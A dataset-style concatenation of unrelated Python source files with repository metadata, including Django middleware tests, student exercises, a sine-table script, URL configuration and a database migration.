response.status_code, status.HTTP_400_BAD_REQUEST
) # Check for a bad request exception because it means the middleware didn't block the request
# /31 block
response = self.client.get("/", REMOTE_ADDR="192.168.0.1")
self.assertNotEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertNotIn(b"IP is not allowed", response.content)
response = self.client.get("/", REMOTE_ADDR="192.168.0.2")
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertIn(b"IP is not allowed", response.content)
response = self.client.get("/batch/", REMOTE_ADDR="192.168.0.1")
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
response = self.client.get("/batch/", REMOTE_ADDR="192.168.0.2")
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
# /24 block
response = self.client.get("/", REMOTE_ADDR="127.0.0.1")
self.assertNotEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertNotIn(b"IP is not allowed", response.content)
response = self.client.get("/", REMOTE_ADDR="127.0.0.100")
self.assertNotEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertNotIn(b"IP is not allowed", response.content)
response = self.client.get("/", REMOTE_ADDR="127.0.0.200")
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertIn(b"IP is not allowed", response.content)
# precise ip
response = self.client.get("/", REMOTE_ADDR="128.0.0.1")
self.assertNotEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertNotIn(b"IP is not allowed", response.content)
response = self.client.get("/", REMOTE_ADDR="128.0.0.2")
self.assertIn(b"IP is not allowed", response.content)
def test_trusted_proxies(self):
with self.settings(
ALLOWED_IP_BLOCKS=["192.168.0.0/31", "127.0.0.0/25,128.0.0.1"], USE_X_FORWARDED_HOST=True,
):
with self.settings(TRUSTED_PROXIES="10.0.0.1"):
response = self.client.get("/", REMOTE_ADDR="10.0.0.1", HTTP_X_FORWARDED_FOR="192.168.0.1,10.0.0.1",)
self.assertNotIn(b"IP is not allowed", response.content)
def test_attempt_spoofing(self):
with self.settings(
ALLOWED_IP_BLOCKS=["192.168.0.0/31", "127.0.0.0/25,128.0.0.1"], USE_X_FORWARDED_HOST=True,
):
with self.settings(TRUSTED_PROXIES="10.0.0.1"):
response = self.client.get("/", REMOTE_ADDR="10.0.0.1", HTTP_X_FORWARDED_FOR="192.168.0.1,10.0.0.2",)
self.assertIn(b"IP is not allowed", response.content)
def test_trust_all_proxies(self):
with self.settings(
ALLOWED_IP_BLOCKS=["192.168.0.0/31", "127.0.0.0/25,128.0.0.1"], USE_X_FORWARDED_HOST=True,
):
with self.settings(TRUST_ALL_PROXIES=True):
response = self.client.get("/", REMOTE_ADDR="10.0.0.1", HTTP_X_FORWARDED_FOR="192.168.0.1,10.0.0.1",)
self.assertNotIn(b"IP is not allowed", response.content)
class TestToolbarCookieMiddleware(APIBaseTest):
CONFIG_AUTO_LOGIN = False
def test_logged_out_client(self):
response = self.client.get("/")
self.assertEqual(0, len(response.cookies))
def test_logged_in_client(self):
with self.settings(TOOLBAR_COOKIE_NAME="phtoolbar", TOOLBAR_COOKIE_SECURE=False):
self.client.force_login(self.user)
response = self.client.get("/")
toolbar_cookie = response.cookies[settings.TOOLBAR_COOKIE_NAME]
self.assertEqual(toolbar_cookie.key, settings.TOOLBAR_COOKIE_NAME)
self.assertEqual(toolbar_cookie.value, "yes")
self.assertEqual(toolbar_cookie["path"], "/")
self.assertEqual(toolbar_cookie["samesite"], "None")
self.assertEqual(toolbar_cookie["httponly"], True)
self.assertEqual(toolbar_cookie["domain"], "")
self.assertEqual(toolbar_cookie["comment"], "")
self.assertEqual(toolbar_cookie["secure"], "")
self.assertEqual(toolbar_cookie["max-age"], 31536000)
def test_logged_in_client_secure(self):
with self.settings(TOOLBAR_COOKIE_NAME="phtoolbar", TOOLBAR_COOKIE_SECURE=True):
self.client.force_login(self.user)
response = self.client.get("/")
toolbar_cookie = response.cookies[settings.TOOLBAR_COOKIE_NAME]
self.assertEqual(toolbar_cookie.key, "phtoolbar")
self.assertEqual(toolbar_cookie.value, "yes")
self.assertEqual(toolbar_cookie["path"], "/")
self.assertEqual(toolbar_cookie["samesite"], "None")
self.assertEqual(toolbar_cookie["httponly"], True)
self.assertEqual(toolbar_cookie["domain"], "")
self.assertEqual(toolbar_cookie["comment"], "")
self.assertEqual(toolbar_cookie["secure"], True)
self.assertEqual(toolbar_cookie["max-age"], 31536000)
def test_logout(self):
with self.settings(TOOLBAR_COOKIE_NAME="phtoolbar"):
self.client.force_login(self.user)
response = self.client.get("/")
self.assertEqual(response.cookies[settings.TOOLBAR_COOKIE_NAME].key, "phtoolbar")
self.assertEqual(response.cookies[settings.TOOLBAR_COOKIE_NAME].value, "yes")
self.assertEqual(response.cookies[settings.TOOLBAR_COOKIE_NAME]["max-age"], 31536000)
response = self.client.get("/logout")
self.assertEqual(response.cookies[settings.TOOLBAR_COOKIE_NAME].key, "phtoolbar")
self.assertEqual(response.cookies[settings.TOOLBAR_COOKIE_NAME].value, "")
self.assertEqual(response.cookies[settings.TOOLBAR_COOKIE_NAME]["max-age"], 0)
|
[
"noreply@github.com"
] |
abhijitghate.noreply@github.com
|
3208b05d0da560dca27f9423abf4a82b2b8c2985
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/30/usersdata/82/9455/submittedfiles/atividade.py
|
c5d3ff8f09f278a98531a889412358d110818bae
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146
| 2017-12-22T16:05:45
| 2017-12-22T16:05:45
| 69,566,344
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 192
|
py
|
# -*- coding: utf-8 -*-
from __future__ import division
import math
n=input('Digite o valor de n:')
i=1
j=n
soma=0
while i<=n:
soma=soma+i/j
i=i+1
j=j-1
print('%.5 f' %soma)
|
[
"rafael.mota@ufca.edu.br"
] |
rafael.mota@ufca.edu.br
|
9ccd664cded01d384a74b70078226710006213ac
|
cf7fed790b733b9a21ec6c65970e9346dba103f5
|
/opencv/gen_sine_table.py
|
a92197731a8388aa38b098c9704de464791890c8
|
[
"MIT"
] |
permissive
|
CospanDesign/python
|
a582050993efc1e6267683e38dd4665952ec6d40
|
a3d81971621d8deed2f1fc738dce0e6eec0db3a7
|
refs/heads/master
| 2022-06-20T15:01:26.210331
| 2022-05-29T01:13:04
| 2022-05-29T01:13:04
| 43,620,126
| 6
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,006
|
py
|
#! /usr/bin/env python3
# Copyright (c) 2017 Dave McCoy (dave.mccoy@cospandesign.com)
#
# NAME is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# any later version.
#
# NAME is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NAME; If not, see <http://www.gnu.org/licenses/>.
import sys
import os
import argparse
import numpy as np
#sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir)))
NAME = os.path.basename(os.path.realpath(__file__))
DESCRIPTION = "\n" \
"\n" \
"usage: %s [options]\n" % NAME
EPILOG = "\n" \
"\n" \
"Examples:\n" \
"\tSomething\n" \
"\n"
def main(argv):
#Parse out the commandline arguments
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description=DESCRIPTION,
epilog=EPILOG
)
parser.add_argument("-t", "--test",
nargs=1,
default=["something"])
parser.add_argument("-d", "--debug",
action="store_true",
help="Enable Debug Messages")
args = parser.parse_args()
print ("Running Script: %s" % NAME)
if args.debug:
print ("test: %s" % str(args.test[0]))
sine_table = []
for i in range(0, 180):
j = i / 2
#print ("%f" % (j))
k = np.deg2rad(j)
sine_table.append(np.sin(k))
with open("sine_table_float.txt", 'w') as f:
for d in sine_table:
f.write("%f\n" % d)
if __name__ == "__main__":
main(sys.argv)
|
[
"cospan@gmail.com"
] |
cospan@gmail.com
|
60e9881d0417bfd779ab8f261e6d4a6eba1be611
|
f2ee087b896000ce500ecdb50d6af3a81c9ea67a
|
/ex16_read_write_file/ex16.py
|
21af6acf9f67a01ada06dcad48bed4c2ac91e3b0
|
[] |
no_license
|
billgoo/Learn_Python_the_Hard_Way
|
5a029223701f1fd6929afbe51b7cd3bfff3e7410
|
a280b4110a10d41edda2e90c817f7a8fbc0cecd6
|
refs/heads/master
| 2020-05-04T17:39:42.275970
| 2019-08-14T14:28:35
| 2019-08-14T14:28:35
| 179,321,167
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,665
|
py
|
"""
========= ===============================================================
Character Meaning
--------- ---------------------------------------------------------------
'r' open for reading (default)
'w' open for writing, truncating the file first
'x' create a new file and open it for writing
'a' open for writing, appending to the end of the file if it exists
'b' binary mode
't' text mode (default)
'+' open a disk file for updating (reading and writing)
'U' universal newline mode (deprecated)
========= ===============================================================
"""
from sys import argv
script, filename = argv
print(f"We're going to erase {filename}.")
print("If you don't want that, hit CTRL-C (^C).") # KeyboardInterrupt
print("If you do want that, hit RETURN.")
input("?")
print("Opening the file...")
target = open(filename, 'w') # open tries to be safe by making you explicitly say you want to write a file
print("Truncating the file. Goodbye!")
# no need truncate because 'w' mode will first do a truncate then do writing
target.truncate()
print("Now I'm going to ask you for three lines.")
line1 = input("line 1: ")
line2 = input("line 2: ")
line3 = input("line 3: ")
print("I'm going to write these to the file.")
'''
target.write(line1)
target.write("\n")
target.write(line2)
target.write("\n")
target.write(line3)
target.write("\n")
'''
# study drill
target.write(f"{line1}\n{line2}\n{line3}\n")
print("And finally, we close it.")
target.close()
txt = open(filename)
print(f"Here's your file {filename}:")
print(txt.read())
txt.close()
|
[
"billgoo0813@gmail.com"
] |
billgoo0813@gmail.com
|
ae8c313063f63d8ca46adb08c54ed25e9c15a211
|
6968c7f9d2b20b5296663829f99a27d184a59fc1
|
/experiments/explorations/experiments/experiment_000202/repetition_000002/calc_statistics_per_repetition.py
|
782a2e55a6ea5672f1258b531b384649ad3979d5
|
[
"MIT"
] |
permissive
|
flowersteam/automated_discovery_of_lenia_patterns
|
d42dff37323d51732571b33845c0562d844f498f
|
97cc7cde2120fa95225d1e470e00b8aa8c034e97
|
refs/heads/master
| 2020-06-29T07:08:58.404541
| 2020-05-14T07:37:10
| 2020-05-14T07:37:10
| 200,470,902
| 13
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,282
|
py
|
import exputils
import autodisc as ad
import os
import imageio
import numpy as np
import torch
import importlib
from torch.autograd import Variable
from sklearn.manifold import TSNE
tsne = TSNE(n_components=2, init='pca', random_state=0)
def collect_final_observation(explorer):
data = dict()
for run_data in explorer.data:
if run_data.observations is not None and len(run_data.observations.states) > 0:
# rescale values from [0 1] to [0 255] and convert to uint8 for saving as bw image
img_data = run_data.observations.states[-1] * 255
img_data = img_data.astype(np.uint8)
png_image = imageio.imwrite(
imageio.RETURN_BYTES,
img_data,
format='PNG-PIL')
data['{:06d}.png'.format(run_data.id)] = png_image
return data
def collect_observations(explorer):
timestamps = [0, 24, 49, 74, 99, 124, 149, 174, 199]
data = dict()
for run_data in explorer.data:
if run_data.observations is not None and len(run_data.observations.states) > 0:
for timestamp in timestamps:
# rescale values from [0 1] to [0 255] and convert to uint8 for saving as bw image
img_data = run_data.observations.states[timestamp] * 255
img_data = img_data.astype(np.uint8)
png_image = imageio.imwrite(
imageio.RETURN_BYTES,
img_data,
format='PNG-PIL')
data['{:06d}_{:06d}.png'.format(run_data.id, timestamp)] = png_image
return data
def collect_representation(explorer):
data = dict()
data_representations = []
n_runs = explorer.data.__len__()
if hasattr(explorer.config.goal_space_representation, 'type') and explorer.config.goal_space_representation.type == 'pytorchnnrepresentation':
if type(explorer).__name__.lower() == 'goalspaceexplorer':
explorer_type = 'pretrainVAE'
elif type(explorer).__name__.lower() == 'onlinelearninggoalexplorer':
explorer_type = 'onlineVAE'
model = explorer.goal_space_representation.model
n_dims_goal_space = model.n_latents
representation_legend = ['dim {}'.format(dim) for dim in range(n_dims_goal_space)]
else:
explorer_type = 'HF'
model = None
representation_legend = explorer.config.goal_space_representation.config.statistics
n_dims_goal_space = len(explorer.config.goal_space_representation.config.statistics)
for run_data in explorer.data:
if run_data.observations is not None and len(run_data.observations.states) > 0:
# fixed representation stored in run_data.reached goal
if explorer_type == 'HF' or explorer_type == 'pretrainVAE': #
data_representations.append(run_data.reached_goal)
# online version: recompute the reached goal with last trained VAE
elif explorer_type == 'onlineVAE':
final_observation = run_data.observations.states[-1]
input_img = Variable(torch.from_numpy(final_observation).unsqueeze(0).unsqueeze(0).float())
outputs = model(input_img)
representation = outputs['mu'].cpu().data.numpy().reshape(n_dims_goal_space)
data_representations.append(representation)
data['representation_type'] = explorer_type
data['n_runs'] = n_runs
data['n_dims_goal_space'] = n_dims_goal_space
data['representation_legend'] = representation_legend
data['coordinates_in_goal_space'] = data_representations
data['coordinates_in_tsne_space'] = tsne.fit_transform(np.asarray(data_representations))
return data
# def load_data(experiment_directory):
#
# dh = ad.ExplorationDataHandler.create(directory=os.path.join(experiment_directory, 'results'))
# dh.load(load_observations=False, verbose=True)
#
# dh.config.save_automatic = False
# dh.config.load_observations = True
# dh.config.memory_size_observations = 1
#
# return dh
def load_explorer(experiment_directory):
# load the full explorer without observations and add its config
explorer = ad.explorers.GoalSpaceExplorer.load_explorer(os.path.join(experiment_directory, 'results'), run_ids=[], load_observations=False, verbose=False)
explorer.data.config.load_observations = True
explorer.data.config.memory_size_observations = 1
spec = importlib.util.spec_from_file_location('experiment_config', os.path.join(experiment_directory, 'experiment_config.py'))
experiment_config_module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(experiment_config_module)
explorer.config = experiment_config_module.get_explorer_config()
return explorer
if __name__ == '__main__':
experiments = '.'
statistics = [('final_observation', collect_final_observation, 'zip'),
('observations', collect_observations, 'zip'),
('representations', collect_representation),
]
exputils.calc_experiment_statistics(statistics, load_explorer, experiments, recalculate_statistics=False, verbose=True)
|
[
"chris.reinke@inria.fr"
] |
chris.reinke@inria.fr
|
667d3a55f26dcbea425733e4d22f03d40b58aea2
|
8f26514c451e2398d5e3688c184ea74d1dad21b2
|
/month_01/test_01/test_02.py
|
60b70e67643224bf76ad67e8d5c2bc33fc6e5eb3
|
[] |
no_license
|
CircularWorld/Python_exercise
|
25e7aebe45b4d2ee4e3e3afded082c56483117de
|
96d4d9c5c626f418803f44584c5350b7ce514368
|
refs/heads/master
| 2022-11-21T07:29:39.054971
| 2020-07-20T10:12:24
| 2020-07-20T10:12:24
| 281,081,559
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 742
|
py
|
'''
2.需求:在终端中获取月份和年份,打印相应的天数.
1 3 5 7 8 10 12 有 31天
2平年有28天,闰年有29天
4 6 9 11 有 30天
步骤:在终端中录入年份和月份,根据逻辑判断 ,显示天数
'''
month = int(input('请输入月份:'))
year = int(input("请输入年份:"))
if month in range(1,13):
if month in (4, 6, 9, 11):
print(f"{year}年{month:02}月有30天")
elif month == 2:
if year % 4 == 0 and year % 100 != 0 or year % 400 == 0:
print(f'{year}是闰年,二月有29天')
else:
print(f'{year}是平年,二月有28天')
else:
print(f"{year}年{month:02}月有31天")
else:
print("输入有误")
|
[
"jiayuhaowork@163.com"
] |
jiayuhaowork@163.com
|
4f7885709411c1849cb738566eade86235d66115
|
906ca170744eb2e075b7236814f2137a0283966d
|
/highFreq/subarraySumClosest.py
|
375a0b7543a6c12ebb1706033df97221ba3ac4fe
|
[] |
no_license
|
logancyang/lintcode
|
815f893ee970d760403b409f2adcb11627ce917e
|
c541fa91b2187391320a8a1dd3e2ca75041b3dab
|
refs/heads/master
| 2021-05-30T14:03:28.795033
| 2015-10-26T19:50:45
| 2015-10-26T19:50:45
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,259
|
py
|
# subarraySumClosest: http://www.lintcode.com/en/problem/subarray-sum-closest/
class Solution:
"""
@param nums: A list of integers
@return: A list of integers includes the index of the first number
and the index of the last number
"""
# brute force O(n^3)
def subarraySumClosestBrute(self, nums):
result = [0, 0]
if nums is None or len(nums) <= 1:
return result
min_dist = float("inf")
# does allow [i, i], a single element as result
for i in xrange(len(nums)):
if abs(nums[i]) < min_dist:
min_dist = abs(nums[i])
result = [i, i]
# this part is O(n^3), too slow
for i in xrange(len(nums)):
for j in xrange(i+1, len(nums)):
tmp_sum = sum(nums[i:j+1])
distance = abs(tmp_sum)
if distance < min_dist:
min_dist = distance
result = [i, j]
return result
def subarraySumClosest(self, nums):
result = [0, 0]
if nums is None or len(nums) <= 1:
return result
min_dist = float("inf")
# does allow [i, i], a single element as result
for i in xrange(len(nums)):
if abs(nums[i]) < min_dist:
min_dist = abs(nums[i])
result = [i, i]
# compute prefix_sum[i] = sum(nums[:i+1]), O(n)
accumulator = 0
pair_sum_ind = []
for i in xrange(len(nums)):
accumulator += nums[i]
# accumulator is prefix_sum[i], i inclusive
pair_sum_ind.append((accumulator, i))
pair_sum_ind.sort(key=lambda tup: tup[0])
min_diff = float("inf")
for i in xrange(1, len(nums)):
diff = abs(pair_sum_ind[i][0] - pair_sum_ind[i-1][0])
if diff < min_diff:
min_diff = diff
result = [pair_sum_ind[i][1], pair_sum_ind[i-1][1]]
result.sort()
# since prefix_sum[j] - prefix_sum[i] refers to subarray sum i+1 to j
# the smaller index in prefix_sum should + 1
result[0] = result[0] + 1
return result
A = [-3, 1, 1, -3, 5]
Sol = Solution()
print Sol.subarraySumClosest(A)
|
[
"logan1934@gmail.com"
] |
logan1934@gmail.com
|
c56498fc4dae80612f8baae4f506c36ed59b0171
|
b39d9ef9175077ac6f03b66d97b073d85b6bc4d0
|
/Benzylpenicillin_Panpharma_powder_for_solution_for_injection_or_infusion_SmPC.py
|
69089c71ae727141e3d4f4acc96f228c2a5007ba
|
[] |
no_license
|
urudaro/data-ue
|
2d840fdce8ba7e759b5551cb3ee277d046464fe0
|
176c57533b66754ee05a96a7429c3e610188e4aa
|
refs/heads/master
| 2021-01-22T12:02:16.931087
| 2013-07-16T14:05:41
| 2013-07-16T14:05:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 511
|
py
|
{'_data': [['Uncommon',
[['General',
u'(>1/1 000 till Blodet och lymfsystemet: eosinofili < 1/100): Hud och subkutan v\xe4vnad: urtikaria']]],
['Rare',
[['General',
u'< 1/1 000): anafylaktiska reaktioner. Blodet och lymfsystemet: agranulocytos, hemolytisk anemi, leukopeni. Magtarmkanalen: diarr\xe9 orsakad av Clostridium difficile.']]],
['Unknown', [['General', u'tromboflebit']]]],
'_pages': [2, 3],
u'_rank': 3,
u'_type': u'LSFU'}
|
[
"daro@daro-ThinkPad-X220.(none)"
] |
daro@daro-ThinkPad-X220.(none)
|
b7bad42217740964a6c56c458b83e77dcb6f7ac0
|
22102fe3aadaabb967b9a0e33af5ea624afdaa38
|
/merge.py
|
6c48c87b8644f6c9004bdadef6fdc3dcc8e4f93d
|
[
"MIT"
] |
permissive
|
tecoholic/Election2021
|
1c840a0e7ba23c885ca07ab9e676087fb312189f
|
0b3fb8930d09883f5b58584f6f14b02d30788cbf
|
refs/heads/main
| 2023-04-30T22:20:37.406868
| 2021-05-14T11:17:16
| 2021-05-14T11:17:16
| 363,843,846
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,297
|
py
|
import os
import pandas as pd
states = {
"AS": 126,
"KL": 140,
"PY": 30,
"TN": 234,
"WB": 294
}
def get_code(party):
if party.lower() == "none of the above":
return "NOTA"
party = party.replace("of ", "") # handle CPIM
parts = party.split(" ")
parts = [p.strip() for p in parts]
return "".join(p[0] if not p.startswith("(") else p[0:2]+p[-1] for p in parts).upper()
def main():
for state in states:
print("Merging files of ", state)
base_dir = os.path.join("may2021", state)
df = None
for i in range(1, states[state] + 1):
filename = os.path.join(base_dir, f"{i}.csv")
try:
data = pd.read_csv(filename)
except FileNotFoundError:
print("Cannot find file: ", filename)
continue
data["AC_NO"] = i
data["Position"] = data["Total Votes"].rank(
ascending=False).astype('int')
data["Party Code"] = data["Party"].apply(get_code)
if df is None:
df = data
else:
df = df.append(data)
fname = os.path.join(base_dir, "all_candidate.csv")
df.to_csv(fname, index=False)
if __name__ == "__main__":
main()
|
[
"arun@arunmozhi.in"
] |
arun@arunmozhi.in
|
450884b464f60b3e241efe035f78dab576018545
|
56aa30f949f9e66bce9b7351d72cf76a65e8cd33
|
/config/urls.py
|
486d4479c5a6cb420fffdd8d1f3b3df2f07eba70
|
[
"MIT"
] |
permissive
|
bfssi-forest-dussault/food_list_db
|
5684677aa9df6cd30fd81ae4a16940af34b32190
|
76d2d56a9948f41cf67f5a1c6612c2726bd0b8b7
|
refs/heads/master
| 2022-12-11T22:38:49.250432
| 2020-09-10T20:17:10
| 2020-09-10T20:17:10
| 294,507,579
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,886
|
py
|
from django.conf import settings
from django.conf.urls.static import static
from django.contrib import admin
from django.urls import include, path
from django.views import defaults as default_views
from django.views.generic import TemplateView
from rest_framework.authtoken.views import obtain_auth_token
urlpatterns = [
path("", TemplateView.as_view(template_name="pages/home.html"), name="home"),
path(
"about/", TemplateView.as_view(template_name="pages/about.html"), name="about"
),
# Django Admin, use {% url 'admin:index' %}
path(settings.ADMIN_URL, admin.site.urls),
# User management
path("users/", include("food_list_db.users.urls", namespace="users")),
path("accounts/", include("allauth.urls")),
# Your stuff: custom urls includes go here
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
# API URLS
urlpatterns += [
# API base url
path("api/", include("config.api_router")),
# DRF auth token
path("auth-token/", obtain_auth_token),
]
if settings.DEBUG:
# This allows the error pages to be debugged during development, just visit
# these url in browser to see how these error pages look like.
urlpatterns += [
path(
"400/",
default_views.bad_request,
kwargs={"exception": Exception("Bad Request!")},
),
path(
"403/",
default_views.permission_denied,
kwargs={"exception": Exception("Permission Denied")},
),
path(
"404/",
default_views.page_not_found,
kwargs={"exception": Exception("Page not Found")},
),
path("500/", default_views.server_error),
]
if "debug_toolbar" in settings.INSTALLED_APPS:
import debug_toolbar
urlpatterns = [path("__debug__/", include(debug_toolbar.urls))] + urlpatterns
|
[
"forest.dussault@canada.ca"
] |
forest.dussault@canada.ca
|
1cb30c9e269871d07348485c6437fce3c01a5415
|
c4c159a21d2f1ea0d7dfaa965aeff01c8ef70dce
|
/flask/flaskenv/Lib/site-packages/pip/_vendor/msgpack/fallback.py
|
dd93d22d4040925980e877b62a2e0b299673c4bd
|
[] |
no_license
|
AhsonAslam/webapi
|
54cf7466aac4685da1105f9fb84c686e38f92121
|
1b2bfa4614e7afdc57c9210b0674506ea70b20b5
|
refs/heads/master
| 2020-07-27T06:05:36.057953
| 2019-09-17T06:35:33
| 2019-09-17T06:35:33
| 208,895,450
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 130
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:f85297381085e0252cf5010ea8096cb08f88640d230516b6ed589e1429e0302e
size 37491
|
[
"github@cuba12345"
] |
github@cuba12345
|
b2fb7e9429aba97f24de724038516d82b01d2628
|
c35b1d9dd99c7b0ad3e8bee3293df7042f9ae39a
|
/flatpages_plus/migrations/0006_auto__add_field_flatpage_photo.py
|
aafdf685ac68e4d45ca808587c1bf1d9451669dc
|
[
"MIT"
] |
permissive
|
grengojbo/django-flatpages-plus
|
467b2e82d3f2d3c71629ddab5288e1416e5ddeda
|
29af987565dd4c87fa3b0751105b5521e2690374
|
refs/heads/master
| 2020-12-24T20:42:23.064557
| 2014-03-02T17:29:22
| 2014-03-02T17:29:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,533
|
py
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'FlatPage.photo'
db.add_column('flatpages_plus_flatpage', 'photo',
self.gf('sorl.thumbnail.fields.ImageField')(max_length=255, null=True, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'FlatPage.photo'
db.delete_column('flatpages_plus_flatpage', 'photo')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'flatpages_plus.categories': {
'Meta': {'object_name': 'Categories'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enable': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
'flatpages_plus.flatpage': {
'Meta': {'ordering': "('url',)", 'object_name': 'FlatPage'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['flatpages_plus.Categories']", 'null': 'True', 'blank': 'True'}),
'content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'blank': 'True'}),
'enable_comments': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'enable_social': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'default': "u'unamed'", 'max_length': '80'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'default': '1', 'to': "orm['auth.User']"}),
'photo': ('sorl.thumbnail.fields.ImageField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'registration_required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'sites': ('django.db.models.fields.related.ManyToManyField', [], {'default': '[1]', 'to': "orm['sites.Site']", 'symmetrical': 'False'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'p'", 'max_length': '1'}),
'template_name': ('django.db.models.fields.CharField', [], {'max_length': '70', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'url': ('django.db.models.fields.CharField', [], {'max_length': '150', 'db_index': 'True'}),
'views': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'})
},
'sites.site': {
'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'taggit.tag': {
'Meta': {'object_name': 'Tag'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '100'})
},
'taggit.taggeditem': {
'Meta': {'object_name': 'TaggedItem'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'taggit_taggeditem_tagged_items'", 'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
